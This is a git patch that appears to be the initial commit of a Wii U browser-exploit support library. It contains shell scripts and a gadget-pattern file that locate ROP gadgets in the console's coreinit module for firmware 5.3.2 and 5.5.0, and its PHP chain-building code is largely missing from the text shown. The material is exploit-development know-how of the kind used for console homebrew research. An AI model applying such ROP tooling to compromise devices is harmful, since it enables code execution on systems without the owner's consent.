From 426271972c30ef6a7c786746d680a7d1fbf69794 Mon Sep 17 00:00:00 2001 From: yellows8 Date: Sun, 22 Nov 2015 13:08:09 -0500 Subject: [PATCH] Initial commit. --- README.md | 6 ++ wiiu_browserhax_common.php | 131 +++++++++++++++++++++++++++++++++++ wiiuhaxx_buildropversions.sh | 3 + wiiuhaxx_locaterop.sh | 22 ++++++ wiiuhaxx_locaterop_script | 7 ++ wiiuhaxx_rop_sysver_532.php | 17 +++++ wiiuhaxx_rop_sysver_550.php | 17 +++++ 7 files changed, 203 insertions(+) create mode 100644 README.md create mode 100644 wiiu_browserhax_common.php create mode 100755 wiiuhaxx_buildropversions.sh create mode 100755 wiiuhaxx_locaterop.sh create mode 100644 wiiuhaxx_locaterop_script create mode 100644 wiiuhaxx_rop_sysver_532.php create mode 100644 wiiuhaxx_rop_sysver_550.php diff --git a/README.md b/README.md new file mode 100644 index 0000000..61ef337 --- /dev/null +++ b/README.md @@ -0,0 +1,6 @@ +This is a common codebase for generating ROP-chains/etc for Wii U exploits. This uses addresses auto-located from coreinit. Currently only binary ROP-chains are supported. + +You must specify the "sysver={val}" URL parameter for pages using this codebase, for selecting your Wii U system-version: +* "532": 5.3.2 +* "550": 5.5.0 + diff --git a/wiiu_browserhax_common.php b/wiiu_browserhax_common.php new file mode 100644 index 0000000..41da988 --- /dev/null +++ b/wiiu_browserhax_common.php @@ -0,0 +1,131 @@ +); +} + +?> diff --git a/wiiuhaxx_buildropversions.sh b/wiiuhaxx_buildropversions.sh new file mode 100755 index 0000000..7c6a913 --- /dev/null +++ b/wiiuhaxx_buildropversions.sh @@ -0,0 +1,3 @@ +./wiiuhaxx_locaterop.sh $1/v11464 0x0101c400 > wiiuhaxx_rop_sysver_532.php +./wiiuhaxx_locaterop.sh $1/v15702 0x0101c400 > wiiuhaxx_rop_sysver_550.php + diff --git a/wiiuhaxx_locaterop.sh b/wiiuhaxx_locaterop.sh new file mode 100755 index 0000000..3f92ee7 --- /dev/null +++ b/wiiuhaxx_locaterop.sh @@ -0,0 +1,22 @@ +ospath=$1 +coreinit_textaddr=$2 + +powerpc-eabi-objcopy --change-section-address .text=$coreinit_textaddr $ospath/coreinit.elf $ospath/coreinit_reloc.elf + +function getcoreinit_symboladdr +{ + val=`powerpc-eabi-readelf -a $ospath/coreinit_reloc.elf | grep "$1" | head -n 1 | cut -d: -f2 | cut "-d " -f2` + echo "$2 = 0x$val;" +} + +echo "" diff --git a/wiiuhaxx_locaterop_script b/wiiuhaxx_locaterop_script new file mode 100644 index 0000000..384b67d --- /dev/null +++ b/wiiuhaxx_locaterop_script @@ -0,0 +1,7 @@ +--patterntype=sha256 --patterndata=c87020ec5098d13edd3ee0d0d01313a0a5f0a7937f36c0f5f4e9503165ae33fb --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK12 = " +--patterntype=sha256 --patterndata=decff3ca875efc1a9c3d0ac7618f3efa3d33ca59bd3fd602a747d3469bd5c000 --patternsha256size=0x10 --addval=0xFFFFFCFC "--plainout=$ROP_POPJUMPLR_STACK20 = " +--patterntype=sha256 --patterndata=5306248821c072a9cf5c71c9469171e17cd2966f66fc7d612ce79cff8d5d124a --patternsha256size=0x34 --addval=0xFFFFFCFC "--plainout=$ROP_CALLFUNC = " +--patterntype=sha256 --patterndata=f4e76053a65c571f2b3b8c6c6dde973c95f889bccf0a22eb9649cbc7810c8e98 --patternsha256size=0x2c --addval=0xFFFFFCFC "--plainout=$ROP_CALLR28_POP_R28_TO_R31 = " +--patterntype=sha256 --patterndata=4741b863adcf742f8928c485a39f3cc8629469d1ddccf9e68c9dd1c25341f091 --patternsha256size=0x20 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R28R29R30R31 = " +--patterntype=sha256 --patterndata=972973be8074e92b0f10fc5fbbaaef6c28e2905f99007654cd735a5fd69933fc --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R27 = " +--patterntype=sha256 --patterndata=6f5f11fdc441ddef8f2189cbc9006517c4917fcf6e975cb8cbeb2373bf8e8ca2 --patternsha256size=0x14 --addval=0xFFFFFCFC "--plainout=$ROP_POP_R24_TO_R31 = " diff --git a/wiiuhaxx_rop_sysver_532.php b/wiiuhaxx_rop_sysver_532.php new file mode 100644 index 0000000..e1057dc --- /dev/null +++ b/wiiuhaxx_rop_sysver_532.php @@ -0,0 +1,17 @@ + diff --git a/wiiuhaxx_rop_sysver_550.php b/wiiuhaxx_rop_sysver_550.php new file mode 100644 index 0000000..3550a32 --- /dev/null +++ b/wiiuhaxx_rop_sysver_550.php @@ -0,0 +1,17 @@ +